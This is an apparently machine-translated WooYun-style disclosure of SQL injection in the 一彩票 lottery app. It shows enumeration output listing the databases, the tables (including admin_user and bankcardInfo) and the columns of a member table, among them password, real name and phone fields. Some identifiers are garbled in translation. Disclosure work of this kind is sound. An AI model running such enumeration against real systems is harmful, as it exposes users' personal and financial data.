Vulnerability title
APP Security: SQL injection in 一彩票 (220W+ user records leaked / name / city / bank)
Vendor
一彩票
Vulnerability author
Exploit DB
Submitted
2016-04-30 12:40
Disclosed
2016-06-19 19:50
Vulnerability type
SQL injection
Severity
High
Self-assessed rank
20
Vulnerability status
Submitted to a third-party partner organization (CNCERT, National Internet Emergency Center)
Vulnerability details
http://**.**.**.**/news/newslist.php?categoryId=15

available databases [7]:
[*] bbs
[*] caiso
[*] information_schema
[*] mysql
[*] performance_schema
[*] 测试
[*] tubiao
Database: caiso
[86 tables]
+------------------------------+
| 帐户 |
| accountlog |
| activity_activities |
| activity_activity_detail |
| admin_channel |
| admin_class |
| admin_permissions |
| admin_role |
| admin_role_function |
| admin_sendsomething_template |
| admin_syslogs |
| admin_user |
| admin_winprize |
| 代理商 |
| bankcardInfo |
| business_activity_partner |
| business_article |
| business_article_category |
| business_article_inlink |
| business_article_partner |
| business_back_money_request |
| business_chase |
| business_chaseitem |
| business_city_no |
| business_community |
| business_company |
| business_cps_day_report |
| business_customer |
| business_customer_commission |
| business_email |
| business_email_log |
| business_feedback |
| business_filedownlod |
| business_friendly_link |
| business_league |
| business_league_rank |
| business_match_arrange |
| business_match_history |
| business_match_mapping |
| business_match_team_mapping |
| business_mobile |
| business_odd |
| business_order |
| business_order_queue |
| business_order_temp |
| business_part |
| business_partner |
| business_pay |
| business_pay_out_request |
| business_payment_request |
| business_plan |
| business_plan_item |
| business_print_term |
| business_prize_level |
| business_recharge_gift |
| business_restricted |
| business_sms_log |
| business_sms_mo_log |
| business_sms_partner |
| business_soft_update |
| business_spread_channel |
| business_supplier |
| business_sys_account |
| business_sys_account_log |
| business_system_param |
| business_team |
| business_term |
| business_term_type_config |
| business_ticket |
| business_wallet |
| business_wallet_log |
| business_win_describe_order |
| business_win_describe_ticket |
| business_win_prize |
| business_you_hui_ma |
| 会员 |
| memberinfo |
| memberlog |
| membershare |
| mibaoinfo |
| 赔率 |
| 点 |
| pointlog |
Failure when receiving data from the peer
| Customer_ip | varchar(255) |
| Customer_type | int(11) |
| 电子邮件 | varchar(255) |
| email_accept | varchar(255) |
| id | bigint(20) |
| is_apply | bit(1) |
| is_pass | int(11) |
| last_login_time | datetime |
| login_num | int(11) |
| mobile_no | varchar(255) |
| nick_name | varchar(255) |
| 老 | int(11) |
| open_id | varchar(255) |
| 密码 | varchar(255) |
| ploy_accur | bigint(20) |
| ploy_consumed | bigint(20) |
| 省 | varchar(255) |
| 问题 | varchar(255) |
| real_name | varchar(255) |
| reg_channel | int(11) |
| reg_source | int(11) |
| register_time | datetime |
| 备注 | varchar(255) |
| sms_accept | varchar(255) |
| sssuper_commission | decimal(19,2) |
| sssuper_ratio | decimal(19,2) |
| sssuperior | bigint(20) |
| ssuper_commission | decimal(19,2) |
| ssuper_ratio | decimal(19,2) |
| ssuperior_id | bigint(20) |
| 状态 | int(11) |
| 支管 | varchar(255) |
| super_commission | decimal(19,2) |
| super_ratio | decimal(19,2) |
| superior_id | bigint(20) |
| user3_id | varchar(255) |
| usr_type | int(11) |
| wake_up_email_num | int(11) |
| wallet_id | bigint(20) |
| yanzhenma | varchar(255) |
+--------------------+---------------+
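Short on time, so I won't dig any deeper~
Proof of vulnerability:
Remediation:
Copyright notice: please credit the source when reposting: Exploit DB @乌云 (WooYun)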